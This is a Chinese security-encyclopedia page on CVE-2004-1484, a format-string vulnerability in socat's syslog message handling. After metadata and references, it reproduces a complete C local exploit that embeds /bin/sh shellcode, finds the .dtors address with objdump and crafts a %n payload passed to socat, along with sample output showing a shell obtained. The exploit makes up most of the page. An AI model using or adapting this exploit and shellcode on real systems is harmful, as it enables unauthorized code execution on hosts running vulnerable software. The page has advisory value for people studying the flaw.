Socat远程格式字符串漏洞-安全小百科

Socat远程格式字符串漏洞

漏洞ID	1108243	漏洞类型	格式化字符串
发布时间	2004-10-23	更新时间	2005-10-20
CVE编号	CVE-2004-1484	CNNVD-ID	CNNVD-200412-449
漏洞平台	Linux	CVSS评分	5.0

|漏洞来源

https://www.exploit-db.com/exploits/591
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-449

|漏洞详情

socat1.4.0.3版本及之前版本的error.c中的_msg函数在被用作HTTP代理客户端并且带-ly运行时，存在格式字符串漏洞。远程攻击者或本地用户可以借助系统记录消息中的格式字符串说明符执行任意代码。

|漏洞EXP

/* socat_exp.c

   Socat Format String Vulnerability

   socat <= 1.4.0.2 local exploit (Proof of Concept)

   Tested in Slackware 9.0 / 9.1 / 10.0

   by CoKi <[email protected]>
   No System Group - http://www.nosystem.com.ar
   
coki@servidor:~$ make socat_exp
coki@servidor:~$ ./socat_exp

 socat <= 1.4.0.2 local exploit (Proof of Concept)
 by CoKi <[email protected]>

 shellcode address = 0xbfffffb9
 .dtors address    = 0x080740c4

2004/10/19 09:49:46 socat[26197] E unknown syslog facility
"ÄÅÆÇ%142u%30$n%70u%31$n%256u%32$n%192u%33$n"
sh-2.05b$

This exploit does not give a root shell :(   
*/

#include <stdio.h>
#include <string.h>

#define PATH "/usr/local/bin/socat"
#define OBJDUMP "/usr/bin/objdump"
#define GREP "/usr/bin/grep"

unsigned char shellcode[]=  /* aleph1 shellcode.45b */
        "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0c"
        "xb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdb"
        "x89xd8x40xcdx80xe8xdcxffxffxffx2fx62x69x6e"
        "x2fx73x68";

int check(unsigned long addr);

int main(int argc, char *argv[]) {

        int i, dtorsaddr;
        unsigned int bal1, bal2, bal3, bal4;
        char temp[512];
        char buffer[1024];
        int cn1, cn2, cn3, cn4;
        FILE *f;
        char *env[3] = {shellcode, NULL};
        int shaddr = 0xbffffffa - strlen(shellcode) - strlen(PATH);

        sprintf(temp, "%s -s -j .dtors %s | %s ffffffff", OBJDUMP, PATH, GREP);
        f = popen(temp, "r");
        if(fscanf(f, " %08x", &dtorsaddr) != 1) {
                pclose(f);
                printf("Cannot find .dtors addressn");
                exit(1);
        }
        pclose(f);
        dtorsaddr = dtorsaddr + 4;

        printf("n socat <= 1.4.0.2 local exploit (Proof of Concept)n");
        printf(" by CoKi <[email protected]>nn");
        printf(" shellcode address = %.8pn", shaddr);
        printf(" .dtors address    = %.8pnn", dtorsaddr);

        bzero(temp, sizeof(temp));
        bzero(buffer, sizeof(buffer));

        strcat(buffer, "-ly");

        for(i = 0; i < 4; i++) {
                bzero(temp, sizeof(temp));
                sprintf(temp, "%s", &dtorsaddr);
                strncat(buffer, temp, 4);
                dtorsaddr++;
        }

        bal1 = (shaddr & 0xff000000) >> 24;
        bal2 = (shaddr & 0x00ff0000) >> 16;
        bal3 = (shaddr & 0x0000ff00) >>  8;
        bal4 = (shaddr & 0x000000ff);

        cn1 = bal4 - 27 - 16;
        cn1 = check(cn1);
        cn2 = bal3 - bal4;
        cn2 = check(cn2);
        cn3 = bal2 - bal3;
        cn3 = check(cn3);
        cn4 = bal1 - bal2;
        cn4 = check(cn4);

        sprintf(temp, "%%%du%%30$n%%%du%%31$n%%%du%%32$n%%%du%%33$n", cn1, cn2, cn3, cn4);

        strcat(buffer, temp);

        execle(PATH, "socat", buffer, NULL, env);
}

int check(unsigned long addr) {
        char tmp[128];
        snprintf(tmp, sizeof(tmp), "%d", addr);
        if(atoi(tmp) < 1)
                addr = addr + 256;

        return addr;
}

// milw0rm.com [2004-10-23]

|参考资料

来源:XF
名称:socat-format-string(17822)
链接:http://xforce.iss.net/xforce/xfdb/17822
来源:BID
名称:11505
链接:http://www.securityfocus.com/bid/11505
来源:www.nosystem.com.ar
链接:http://www.nosystem.com.ar/advisories/advisory-07.txt
来源:GENTOO
名称:GLSA-200410-26
链接:http://www.gentoo.org/security/en/glsa/glsa-200410-26.xml
来源:SECUNIA
名称:12936
链接:http://secunia.com/advisories/12936/
来源:www.dest-unreach.org
链接:http://www.dest-unreach.org/socat/advisory/socat-adv-1.html

相关推荐: Linux kernel内存信息泄露漏洞

Linux kernel内存信息泄露漏洞漏洞ID 1204768 漏洞类型未知发布时间 2002-01-31 更新时间 2002-01-31 CVE编号 CVE-2002-0046 CNNVD-ID CNNVD-200201-018 漏洞平台 N/A C…

文章版权归作者所有，未经允许请勿转载。

THE END